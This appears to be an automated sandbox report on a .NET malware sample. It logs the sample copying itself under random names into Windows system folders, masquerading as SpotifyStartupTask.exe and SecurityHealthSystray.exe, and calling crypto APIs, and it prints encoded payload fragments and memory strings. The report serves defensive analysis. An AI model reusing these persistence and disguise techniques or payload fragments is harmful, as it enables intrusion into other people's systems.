Source: wl6u8IBdDL.8.dr, 3R4C3berUq.8.dr, fxBB58GFxm.8.dr, Sz2didTDsQ.8.dr, dzr1IbElpJ.8.dr, 3mH0e2wtGq.8.dr, BQnmgjEPAd.8.dr, EDNFNRqRCX.8.dr, r6nO9PrJ2r.8.dr, RQS80wxHC2.8.dr, 4VNTeugUym.8.dr, QIM4VpF7vn.8.dr, xs44qKjcu4.8.dr, axygeUNep6.8.dr, E18nFEV4jl.8.dr, A0TnQG2wZy.8.dr, PAT9mlbxus.8.dr, BSqLFpKJBy.8.dr, 9Serf4iVwm.8.dr, p8zvYAKG67.8.dr, LHhG3wYAvF.8.dr	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: wl6u8IBdDL.8.dr, 3R4C3berUq.8.dr, fxBB58GFxm.8.dr, Sz2didTDsQ.8.dr, dzr1IbElpJ.8.dr, 3mH0e2wtGq.8.dr, BQnmgjEPAd.8.dr, EDNFNRqRCX.8.dr, r6nO9PrJ2r.8.dr, RQS80wxHC2.8.dr, 4VNTeugUym.8.dr, QIM4VpF7vn.8.dr, xs44qKjcu4.8.dr, axygeUNep6.8.dr, E18nFEV4jl.8.dr, A0TnQG2wZy.8.dr, PAT9mlbxus.8.dr, BSqLFpKJBy.8.dr, 9Serf4iVwm.8.dr, p8zvYAKG67.8.dr, LHhG3wYAvF.8.dr	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: wl6u8IBdDL.8.dr, 3R4C3berUq.8.dr, fxBB58GFxm.8.dr, Sz2didTDsQ.8.dr, dzr1IbElpJ.8.dr, 3mH0e2wtGq.8.dr, BQnmgjEPAd.8.dr, EDNFNRqRCX.8.dr, r6nO9PrJ2r.8.dr, RQS80wxHC2.8.dr, 4VNTeugUym.8.dr, QIM4VpF7vn.8.dr, xs44qKjcu4.8.dr, axygeUNep6.8.dr, E18nFEV4jl.8.dr, A0TnQG2wZy.8.dr, PAT9mlbxus.8.dr, BSqLFpKJBy.8.dr, 9Serf4iVwm.8.dr, p8zvYAKG67.8.dr, LHhG3wYAvF.8.dr	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: wl6u8IBdDL.8.dr, 3R4C3berUq.8.dr, fxBB58GFxm.8.dr, Sz2didTDsQ.8.dr, dzr1IbElpJ.8.dr, 3mH0e2wtGq.8.dr, BQnmgjEPAd.8.dr, EDNFNRqRCX.8.dr, r6nO9PrJ2r.8.dr, RQS80wxHC2.8.dr, 4VNTeugUym.8.dr, QIM4VpF7vn.8.dr, xs44qKjcu4.8.dr, axygeUNep6.8.dr, E18nFEV4jl.8.dr, A0TnQG2wZy.8.dr, PAT9mlbxus.8.dr, BSqLFpKJBy.8.dr, 9Serf4iVwm.8.dr, p8zvYAKG67.8.dr, LHhG3wYAvF.8.dr	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: wl6u8IBdDL.8.dr, 3R4C3berUq.8.dr, fxBB58GFxm.8.dr, Sz2didTDsQ.8.dr, dzr1IbElpJ.8.dr, 3mH0e2wtGq.8.dr, BQnmgjEPAd.8.dr, EDNFNRqRCX.8.dr, r6nO9PrJ2r.8.dr, RQS80wxHC2.8.dr, 4VNTeugUym.8.dr, QIM4VpF7vn.8.dr, xs44qKjcu4.8.dr, axygeUNep6.8.dr, E18nFEV4jl.8.dr, A0TnQG2wZy.8.dr, PAT9mlbxus.8.dr, BSqLFpKJBy.8.dr, 9Serf4iVwm.8.dr, p8zvYAKG67.8.dr, LHhG3wYAvF.8.dr	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: QHmjTo927m.8.dr	String found in binary or memory: https://support.mozilla.org
Source: QHmjTo927m.8.dr	String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
Source: qioiNOJzhriMVnsRuLz.exe, 00000008.00000002.4109389958.000000000285B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/products/firefox
Source: QHmjTo927m.8.dr	String found in binary or memory: https://support.mozilla.org/products/firefoxgro.allizom.troppus.zvXrErQ5GYDF
Source: qioiNOJzhriMVnsRuLz.exe, 00000008.00000002.4109389958.000000000285B000.00000004.00000800.00020000.00000000.sdmp, qioiNOJzhriMVnsRuLz.exe, 00000008.00000002.4119285717.0000000013588000.00000004.00000800.00020000.00000000.sdmp, qioiNOJzhriMVnsRuLz.exe, 00000008.00000002.4119285717.0000000013711000.00000004.00000800.00020000.00000000.sdmp, qioiNOJzhriMVnsRuLz.exe, 00000008.00000002.4119285717.00000000134E3000.00000004.00000800.00020000.00000000.sdmp, qioiNOJzhriMVnsRuLz.exe, 00000008.00000002.4119285717.0000000013400000.00000004.00000800.00020000.00000000.sdmp, qioiNOJzhriMVnsRuLz.exe, 00000008.00000002.4119285717.0000000012D89000.00000004.00000800.00020000.00000000.sdmp, qioiNOJzhriMVnsRuLz.exe, 00000008.00000002.4119285717.000000001366B000.00000004.00000800.00020000.00000000.sdmp, zH6ODGHWVs.8.dr, O06yTeSelT.8.dr, tyMvg3p7gV.8.dr, Iwk8nVZifj.8.dr, HOU1YLTqTo.8.dr, UEgt634ZBI.8.dr, BHcZiwPpaf.8.dr, AYaEK7y8b6.8.dr, qjBxaNG8Qr.8.dr, 4Ca6TwAakY.8.dr, uV7ZCuCyFP.8.dr, C8TzAweWcR.8.dr, PCEHZ8WFFm.8.dr, RVXqOeieD9.8.dr	String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016
Source: qioiNOJzhriMVnsRuLz.exe, 00000008.00000002.4119285717.00000000133DB000.00000004.00000800.00020000.00000000.sdmp, qioiNOJzhriMVnsRuLz.exe, 00000008.00000002.4119285717.00000000136EC000.00000004.00000800.00020000.00000000.sdmp, qioiNOJzhriMVnsRuLz.exe, 00000008.00000002.4119285717.00000000147AA000.00000004.00000800.00020000.00000000.sdmp, qioiNOJzhriMVnsRuLz.exe, 00000008.00000002.4119285717.0000000013648000.00000004.00000800.00020000.00000000.sdmp, qioiNOJzhriMVnsRuLz.exe, 00000008.00000002.4119285717.00000000134BE000.00000004.00000800.00020000.00000000.sdmp, qioiNOJzhriMVnsRuLz.exe, 00000008.00000002.4119285717.0000000013563000.00000004.00000800.00020000.00000000.sdmp, qioiNOJzhriMVnsRuLz.exe, 00000008.00000002.4119285717.0000000012D64000.00000004.00000800.00020000.00000000.sdmp, zH6ODGHWVs.8.dr, O06yTeSelT.8.dr, tyMvg3p7gV.8.dr, Iwk8nVZifj.8.dr, HOU1YLTqTo.8.dr, UEgt634ZBI.8.dr, BHcZiwPpaf.8.dr, AYaEK7y8b6.8.dr, qjBxaNG8Qr.8.dr, 4Ca6TwAakY.8.dr, uV7ZCuCyFP.8.dr, C8TzAweWcR.8.dr, PCEHZ8WFFm.8.dr, RVXqOeieD9.8.dr	String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples
Source: qioiNOJzhriMVnsRuLz.exe, 00000008.00000002.4109389958.000000000285B000.00000004.00000800.00020000.00000000.sdmp, qioiNOJzhriMVnsRuLz.exe, 00000008.00000002.4119285717.0000000013588000.00000004.00000800.00020000.00000000.sdmp, qioiNOJzhriMVnsRuLz.exe, 00000008.00000002.4119285717.0000000013711000.00000004.00000800.00020000.00000000.sdmp, qioiNOJzhriMVnsRuLz.exe, 00000008.00000002.4119285717.00000000134E3000.00000004.00000800.00020000.00000000.sdmp, qioiNOJzhriMVnsRuLz.exe, 00000008.00000002.4119285717.0000000013400000.00000004.00000800.00020000.00000000.sdmp, qioiNOJzhriMVnsRuLz.exe, 00000008.00000002.4119285717.0000000012D89000.00000004.00000800.00020000.00000000.sdmp, qioiNOJzhriMVnsRuLz.exe, 00000008.00000002.4119285717.000000001366B000.00000004.00000800.00020000.00000000.sdmp, zH6ODGHWVs.8.dr, O06yTeSelT.8.dr, tyMvg3p7gV.8.dr, Iwk8nVZifj.8.dr, HOU1YLTqTo.8.dr, UEgt634ZBI.8.dr, BHcZiwPpaf.8.dr, AYaEK7y8b6.8.dr, qjBxaNG8Qr.8.dr, 4Ca6TwAakY.8.dr, uV7ZCuCyFP.8.dr, C8TzAweWcR.8.dr, PCEHZ8WFFm.8.dr, RVXqOeieD9.8.dr	String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17
Source: qioiNOJzhriMVnsRuLz.exe, 00000008.00000002.4119285717.00000000133DB000.00000004.00000800.00020000.00000000.sdmp, qioiNOJzhriMVnsRuLz.exe, 00000008.00000002.4119285717.00000000136EC000.00000004.00000800.00020000.00000000.sdmp, qioiNOJzhriMVnsRuLz.exe, 00000008.00000002.4119285717.00000000147AA000.00000004.00000800.00020000.00000000.sdmp, qioiNOJzhriMVnsRuLz.exe, 00000008.00000002.4119285717.0000000013648000.00000004.00000800.00020000.00000000.sdmp, qioiNOJzhriMVnsRuLz.exe, 00000008.00000002.4119285717.00000000134BE000.00000004.00000800.00020000.00000000.sdmp, qioiNOJzhriMVnsRuLz.exe, 00000008.00000002.4119285717.0000000013563000.00000004.00000800.00020000.00000000.sdmp, qioiNOJzhriMVnsRuLz.exe, 00000008.00000002.4119285717.0000000012D64000.00000004.00000800.00020000.00000000.sdmp, zH6ODGHWVs.8.dr, O06yTeSelT.8.dr, tyMvg3p7gV.8.dr, Iwk8nVZifj.8.dr, HOU1YLTqTo.8.dr, UEgt634ZBI.8.dr, BHcZiwPpaf.8.dr, AYaEK7y8b6.8.dr, qjBxaNG8Qr.8.dr, 4Ca6TwAakY.8.dr, uV7ZCuCyFP.8.dr, C8TzAweWcR.8.dr, PCEHZ8WFFm.8.dr, RVXqOeieD9.8.dr	String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install
Source: wl6u8IBdDL.8.dr, 3R4C3berUq.8.dr, fxBB58GFxm.8.dr, Sz2didTDsQ.8.dr, dzr1IbElpJ.8.dr, 3mH0e2wtGq.8.dr, BQnmgjEPAd.8.dr, EDNFNRqRCX.8.dr, r6nO9PrJ2r.8.dr, RQS80wxHC2.8.dr, 4VNTeugUym.8.dr, QIM4VpF7vn.8.dr, xs44qKjcu4.8.dr, axygeUNep6.8.dr, E18nFEV4jl.8.dr, A0TnQG2wZy.8.dr, PAT9mlbxus.8.dr, BSqLFpKJBy.8.dr, 9Serf4iVwm.8.dr, p8zvYAKG67.8.dr, LHhG3wYAvF.8.dr	String found in binary or memory: https://www.ecosia.org/newtab/
Source: wl6u8IBdDL.8.dr, 3R4C3berUq.8.dr, fxBB58GFxm.8.dr, Sz2didTDsQ.8.dr, dzr1IbElpJ.8.dr, 3mH0e2wtGq.8.dr, BQnmgjEPAd.8.dr, EDNFNRqRCX.8.dr, r6nO9PrJ2r.8.dr, RQS80wxHC2.8.dr, 4VNTeugUym.8.dr, QIM4VpF7vn.8.dr, xs44qKjcu4.8.dr, axygeUNep6.8.dr, E18nFEV4jl.8.dr, A0TnQG2wZy.8.dr, PAT9mlbxus.8.dr, BSqLFpKJBy.8.dr, 9Serf4iVwm.8.dr, p8zvYAKG67.8.dr, LHhG3wYAvF.8.dr	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: QHmjTo927m.8.dr	String found in binary or memory: https://www.mozilla.org
Source: qioiNOJzhriMVnsRuLz.exe, 00000008.00000002.4109389958.000000000285B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/about/
Source: QHmjTo927m.8.dr	String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.VsJpOAWrHqB2
Source: qioiNOJzhriMVnsRuLz.exe, 00000008.00000002.4109389958.000000000285B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/contribute/
Source: QHmjTo927m.8.dr	String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.n0g9CLHwD9nR
Source: qioiNOJzhriMVnsRuLz.exe, 00000008.00000002.4109389958.000000000285B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/
Source: qioiNOJzhriMVnsRuLz.exe, 00000008.00000002.4119285717.0000000012ED9000.00000004.00000800.00020000.00000000.sdmp, qioiNOJzhriMVnsRuLz.exe, 00000008.00000002.4119285717.0000000013877000.00000004.00000800.00020000.00000000.sdmp, qioiNOJzhriMVnsRuLz.exe, 00000008.00000002.4119285717.0000000014277000.00000004.00000800.00020000.00000000.sdmp, qioiNOJzhriMVnsRuLz.exe, 00000008.00000002.4119285717.0000000013D77000.00000004.00000800.00020000.00000000.sdmp, qD4flMOkUc.8.dr, QHmjTo927m.8.dr	String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
Source: QHmjTo927m.8.dr	String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
Source: qioiNOJzhriMVnsRuLz.exe, 00000008.00000002.4109389958.000000000285B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/privacy/firefox/
Source: qioiNOJzhriMVnsRuLz.exe, 00000008.00000002.4119285717.0000000012ED9000.00000004.00000800.00020000.00000000.sdmp, qioiNOJzhriMVnsRuLz.exe, 00000008.00000002.4119285717.0000000013877000.00000004.00000800.00020000.00000000.sdmp, qioiNOJzhriMVnsRuLz.exe, 00000008.00000002.4119285717.0000000014277000.00000004.00000800.00020000.00000000.sdmp, qioiNOJzhriMVnsRuLz.exe, 00000008.00000002.4119285717.0000000013D77000.00000004.00000800.00020000.00000000.sdmp, qD4flMOkUc.8.dr, QHmjTo927m.8.dr	String found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.

Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe

Window created: window name: CLIPBRDWNDCLASS

Jump to behavior

System Summary

.NET source code contains very large strings

Source: 0.2.QMT2731i8k.exe.2480000.5.raw.unpack, Class16.cs

Long String: Length: 157720

Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe

Process Stats: CPU usage > 49%

Source: C:\Users\user\Desktop\QMT2731i8k.exe	File created: C:\Windows\ImmersiveControlPanel\qioiNOJzhriMVnsRuLz.exe	Jump to behavior
Source: C:\Users\user\Desktop\QMT2731i8k.exe	File created: C:\Windows\ImmersiveControlPanel\qioiNOJzhriMVnsRuLz.exe\:Zone.Identifier:$DATA	Jump to behavior
Source: C:\Users\user\Desktop\QMT2731i8k.exe	File created: C:\Windows\ImmersiveControlPanel\1f2b6125644fa3	Jump to behavior
Source: C:\Users\user\Desktop\QMT2731i8k.exe	File created: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	Jump to behavior
Source: C:\Users\user\Desktop\QMT2731i8k.exe	File created: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe\:Zone.Identifier:$DATA	Jump to behavior
Source: C:\Users\user\Desktop\QMT2731i8k.exe	File created: C:\Windows\ModemLogs\1f2b6125644fa3	Jump to behavior
Source: C:\Users\user\Desktop\QMT2731i8k.exe	File created: C:\Windows\twain_32\qioiNOJzhriMVnsRuLz.exe	Jump to behavior
Source: C:\Users\user\Desktop\QMT2731i8k.exe	File created: C:\Windows\twain_32\qioiNOJzhriMVnsRuLz.exe\:Zone.Identifier:$DATA	Jump to behavior
Source: C:\Users\user\Desktop\QMT2731i8k.exe	File created: C:\Windows\twain_32\1f2b6125644fa3	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	File created: c:\Windows\System32\CSCD6A0005F729947378317C8DDF47B6938.TMP	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	File created: c:\Windows\System32\SecurityHealthSystray.exe	Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe

File deleted: C:\Windows\System32\CSCD6A0005F729947378317C8DDF47B6938.TMP

Jump to behavior

Source: C:\Users\user\Desktop\QMT2731i8k.exe	Code function: 0_2_00007FFD9B888850	0_2_00007FFD9B888850
Source: C:\Users\user\Desktop\QMT2731i8k.exe	Code function: 0_2_00007FFD9B881F82	0_2_00007FFD9B881F82
Source: C:\Users\user\Desktop\QMT2731i8k.exe	Code function: 0_2_00007FFD9B88BF15	0_2_00007FFD9B88BF15
Source: C:\Users\user\Desktop\QMT2731i8k.exe	Code function: 0_2_00007FFD9B88AF40	0_2_00007FFD9B88AF40
Source: C:\Users\user\Desktop\QMT2731i8k.exe	Code function: 0_2_00007FFD9B88BE40	0_2_00007FFD9B88BE40
Source: C:\Users\user\Desktop\QMT2731i8k.exe	Code function: 0_2_00007FFD9B880C81	0_2_00007FFD9B880C81
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	Code function: 8_2_00007FFD9BAC8850	8_2_00007FFD9BAC8850
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	Code function: 8_2_00007FFD9BAC1F82	8_2_00007FFD9BAC1F82
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	Code function: 8_2_00007FFD9BACBF15	8_2_00007FFD9BACBF15
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	Code function: 8_2_00007FFD9BACAF40	8_2_00007FFD9BACAF40
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	Code function: 8_2_00007FFD9BACBE40	8_2_00007FFD9BACBE40
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	Code function: 8_2_00007FFD9BAC0C81	8_2_00007FFD9BAC0C81
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	Code function: 8_2_00007FFD9BC3D030	8_2_00007FFD9BC3D030
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	Code function: 8_2_00007FFD9BC3F44E	8_2_00007FFD9BC3F44E
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	Code function: 8_2_00007FFD9BC30E52	8_2_00007FFD9BC30E52
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	Code function: 8_2_00007FFD9BC379FB	8_2_00007FFD9BC379FB
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	Code function: 8_2_00007FFD9BC300A6	8_2_00007FFD9BC300A6
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	Code function: 8_2_00007FFD9BC368B9	8_2_00007FFD9BC368B9
Source: C:\Windows\ImmersiveControlPanel\qioiNOJzhriMVnsRuLz.exe	Code function: 10_2_00007FFD9BA91F82	10_2_00007FFD9BA91F82
Source: C:\Windows\ImmersiveControlPanel\qioiNOJzhriMVnsRuLz.exe	Code function: 10_2_00007FFD9BA90C81	10_2_00007FFD9BA90C81
Source: C:\Users\user\Desktop\QMT2731i8k.exe	Code function: 14_2_00007FFD9BAD1F82	14_2_00007FFD9BAD1F82
Source: C:\Users\user\Desktop\QMT2731i8k.exe	Code function: 14_2_00007FFD9BAD0C81	14_2_00007FFD9BAD0C81
Source: C:\Windows\ImmersiveControlPanel\qioiNOJzhriMVnsRuLz.exe	Code function: 15_2_00007FFD9BAB1F82	15_2_00007FFD9BAB1F82
Source: C:\Windows\ImmersiveControlPanel\qioiNOJzhriMVnsRuLz.exe	Code function: 15_2_00007FFD9BAB0C81	15_2_00007FFD9BAB0C81
Source: C:\Users\user\Desktop\QMT2731i8k.exe	Code function: 16_2_00007FFD9BAB1F82	16_2_00007FFD9BAB1F82
Source: C:\Users\user\Desktop\QMT2731i8k.exe	Code function: 16_2_00007FFD9BAB0C81	16_2_00007FFD9BAB0C81
Source: C:\Windows\ImmersiveControlPanel\qioiNOJzhriMVnsRuLz.exe	Code function: 17_2_00007FFD9BAD1F82	17_2_00007FFD9BAD1F82
Source: C:\Windows\ImmersiveControlPanel\qioiNOJzhriMVnsRuLz.exe	Code function: 17_2_00007FFD9BAD0C81	17_2_00007FFD9BAD0C81
Source: C:\Users\user\Desktop\QMT2731i8k.exe	Code function: 18_2_00007FFD9BAA1F82	18_2_00007FFD9BAA1F82
Source: C:\Users\user\Desktop\QMT2731i8k.exe	Code function: 18_2_00007FFD9BAA0C81	18_2_00007FFD9BAA0C81
Source: C:\Recovery\qioiNOJzhriMVnsRuLz.exe	Code function: 19_2_00007FFD9BAC1F82	19_2_00007FFD9BAC1F82
Source: C:\Recovery\qioiNOJzhriMVnsRuLz.exe	Code function: 19_2_00007FFD9BAC0C81	19_2_00007FFD9BAC0C81
Source: C:\Windows\twain_32\qioiNOJzhriMVnsRuLz.exe	Code function: 20_2_00007FFD9BAC1F82	20_2_00007FFD9BAC1F82
Source: C:\Windows\twain_32\qioiNOJzhriMVnsRuLz.exe	Code function: 20_2_00007FFD9BAC0C81	20_2_00007FFD9BAC0C81
Source: C:\Windows\ImmersiveControlPanel\qioiNOJzhriMVnsRuLz.exe	Code function: 22_2_00007FFD9BAC1F82	22_2_00007FFD9BAC1F82
Source: C:\Windows\ImmersiveControlPanel\qioiNOJzhriMVnsRuLz.exe	Code function: 22_2_00007FFD9BAC0C81	22_2_00007FFD9BAC0C81
Source: C:\Users\user\Desktop\QMT2731i8k.exe	Code function: 23_2_00007FFD9BAC1F82	23_2_00007FFD9BAC1F82
Source: C:\Users\user\Desktop\QMT2731i8k.exe	Code function: 23_2_00007FFD9BAC0C81	23_2_00007FFD9BAC0C81

Source: Joe Sandbox View

Dropped File: C:\Users\user\Desktop\EPzTPNOj.log DD4560987BD87EF3E6E8FAE220BA22AA08812E9743352523C846553BD99E4254

Source: TtUAGVJK.log.0.dr	Static PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
Source: ZmxZjBOz.log.0.dr	Static PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
Source: PDeJzYJR.log.0.dr	Static PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
Source: GZVUPftk.log.0.dr	Static PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
Source: EPzTPNOj.log.0.dr	Static PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970

Source: QMT2731i8k.exe, 00000000.00000000.1647922950.00000000003F4000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenameSpotifyStartupTask.exe$ vs QMT2731i8k.exe
Source: QMT2731i8k.exe	Binary or memory string: OriginalFilenameSpotifyStartupTask.exe$ vs QMT2731i8k.exe

Source: QMT2731i8k.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: QMT2731i8k.exe	Static PE information: Section: .reloc ZLIB complexity 1.009765625
Source: qioiNOJzhriMVnsRuLz.exe.0.dr	Static PE information: Section: .reloc ZLIB complexity 1.009765625
Source: qioiNOJzhriMVnsRuLz.exe0.0.dr	Static PE information: Section: .reloc ZLIB complexity 1.009765625
Source: qioiNOJzhriMVnsRuLz.exe1.0.dr	Static PE information: Section: .reloc ZLIB complexity 1.009765625
Source: qioiNOJzhriMVnsRuLz.exe2.0.dr	Static PE information: Section: .reloc ZLIB complexity 1.009765625
Source: qioiNOJzhriMVnsRuLz.exe3.0.dr	Static PE information: Section: .reloc ZLIB complexity 1.009765625

Source: TtUAGVJK.log.0.dr, -.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: ZmxZjBOz.log.0.dr, -.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: PDeJzYJR.log.0.dr, -.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: GZVUPftk.log.0.dr, -.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: EPzTPNOj.log.0.dr, -.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.QMT2731i8k.exe.2480000.5.raw.unpack, Stream5.cs	Cryptographic APIs: 'TransformBlock'
Source: 0.2.QMT2731i8k.exe.2480000.5.raw.unpack, Stream5.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.QMT2731i8k.exe.2480000.5.raw.unpack, Stream5.cs	Cryptographic APIs: 'TransformFinalBlock', 'TransformBlock'
Source: 0.2.QMT2731i8k.exe.12881f10.6.raw.unpack, -.cs	Cryptographic APIs: 'TransformFinalBlock'

Source: 0.2.QMT2731i8k.exe.2480000.5.raw.unpack, qJk.cs	Base64 encoded string: 'H4sIAAAAAAAEAMsoKSkottLXzyzIzEvL18vM188qzs8DACTOYY8WAAAA', 'H4sIAAAAAAAACssoKSkottLXTyzI1Mss0CtO0k9Pzc8sAABsWDNKFwAAAA=='
Source: 0.2.QMT2731i8k.exe.2480000.5.raw.unpack, Class17.cs	Base64 encoded string: 'ICBfX18gICAgICAgICAgIF8gICAgICBfX18gICAgICAgICAgICAgXyAgICAgICAgXyAgIF9fXyAgICBfIF9fX19fIA0KIHwgICBcIF9fIF8gXyBffCB8X18gIC8gX198XyBfIF8gIF8gX198IHxfIF9fIF98IHwgfCBfIFwgIC9fXF8gICBffA0KIHwgfCkgLyBfYCB8ICdffCAvIC8gfCAoX198ICdffCB8fCAoXy08ICBfLyBfYCB8IHwgfCAgIC8gLyBfIFx8IHwgIA0KIHxfX18vXF9fLF98X3wgfF9cX1wgIFxfX198X3wgIFxfLCAvX18vXF9fXF9fLF98X3wgfF98X1wvXy8gXF9cX3wgIA0KICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHxfXy8gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIA=='
Source: 0.2.QMT2731i8k.exe.2480000.5.raw.unpack, Class16.cs	Base64 encoded string: 'H4sIAAAAAAAEAEu1FWCWqKjkZBH1lJSQk5YUYwpi5eaWZAwPYhRhimWJE44tLy9UV6hVKdLT18wsM8sRSCjOKBRXUFU2N6kor2PKr41yNhMUZHDx9jKL8Azzt5JlFQmID9NyDXWK1uPklIhh+gsAi8VS+2MAAAA=', 'H4sIAAAAAAAEADSbx5KCaBRG32W2LMhpSc45MyvJGQGJTz/0YrrK1tIu+dP97jnV+u+//8jYpjD//1gIzcVNEBbKWVnkj/z9VqdbWHJ/Ct0Qxt91eFHemCwnNh1xqQPju5A17Q7Hqhf6/hZOH2WZUBTkHBJlqQlluQqvU8qjMHdPtwhcWakXC5sffVawlRricM8q38lwlDpIG3yeAwQfGwH8aP18/S+F4UW5RkiEofmVFk/sGYYP5yqEnXTXdRM1bTZKE1jwRcgAHzu8qSSQwAx7h7Es1sfF3umZVKAZZ5ZnSz7Srhf6nJ0AYa1diub4jyTW81MgWy+yRDZITvotl8TGkAtJNKvK1uPGuZG+GL+BN1FAjLVOGWxFoIzhi/xHLLADPz0dfTbwJNI2oohHY4v+phtdiQFgBy8JRW6npKjriMaWKGZctwzESZsWpulZJkbWVATaOIVyvKZSDiaU38jdu2H64991BveZUEIK1QV7LxTLR1pZ6ms2K3DJpRR5IvcjSGtZ6x+ghgWed/GUATY6pr54SnetULE9atyI0iSD8HpRId8NhHJG95f5ywjEU9eRJ6X8aeLIsK0eIjJIx49JT0QPr2bqNtTIjUj4Y8RR7ZW/9Crvlu5EUtSQOkQlc9V1xI03b/2oWZTG2+dIxSkxEWpBtuhIiykpdpwsTgnvTVIoSClFOHAzh/g3w5gCgdgSHHllVZX9RUzV1J6oMjt+d/pMAijDGM5g1+BLzRmEvU88lobL2nW9zjcBFlosXVsN8+di5YYTziWxci2J4DSyOo+AipXKLZaVhayT+PkPMdoOAnnKwCEp32/4ItvqWoKi7hvtCofIetCJtLrwJyJ95COhHjJHsZ8hHsz9xCwql7CFww6ewg8s69tnHZCfS6jaBHtDti5+XAtU1UJeoCPUnmvpqJ/gDpKmv2Q+Ivr4syj4BbVeUexfYweDMcY+zhp8gKQ3SgcysB52kvSdp8zRdx7mTFhLGx0bdFMN3Cm3GDsIbJLUyizkLCMpmGAoM9M0vofFOh86fJzqbWTwaWFu0yhv7fxc1ZDhNkz93qf6CFn7yMqMJ75DQKc6wdZUvU+IQjNCVVv3+ttkpIKSht2+V5xjVeKtpS5o8PJVo+cBVCzV6ggClgN/rd92vVUmWUuWtlT5qzGrpvk5FrCsFlA6qq+PQ4zrofy8Ecy7qU93YTG1gsVDbLXbipz3oI63QskTmJCl6V87Hc4ca1YjkCaEfrbRab5AWapZc5rmLMBNilOi5f80sQwJ//ED6YYW2cSG0eY6VAN0DYRnZrBysv84HaJY0yXj0YmnAJSkUhXQAEPD6BZoRzlqFhjfMRXiDi0CKWvZk9JEA2v1JYJ3wVYD5U+RnuzHwTIwSVblLxVxGx84/rEuf+vg0ThvSXjkZH212X9kW8Y3EihbUACsKtbeFfF/H+757EcC7TbU1qw323waDUujOTKO+mo66ASANniN85W83Ndwq4eYo08FLeyEtKCSzceNaCzl4rlt35qpbMA95s0JfEiUL6CzdL99bndCR9gsHZ8ljjbxUBM6pbnZFjq/HVULlJiwrVCQqIkvm2v0SiS/lnc7VJt7icspYJ8yPhdRLRZs/dUmHnZpat373ATVgdqoYhu4lzJInqdctirMPudFriZs/d1YKnRZKpdMwiW8R0Fw26BVLiuVZo9zFgH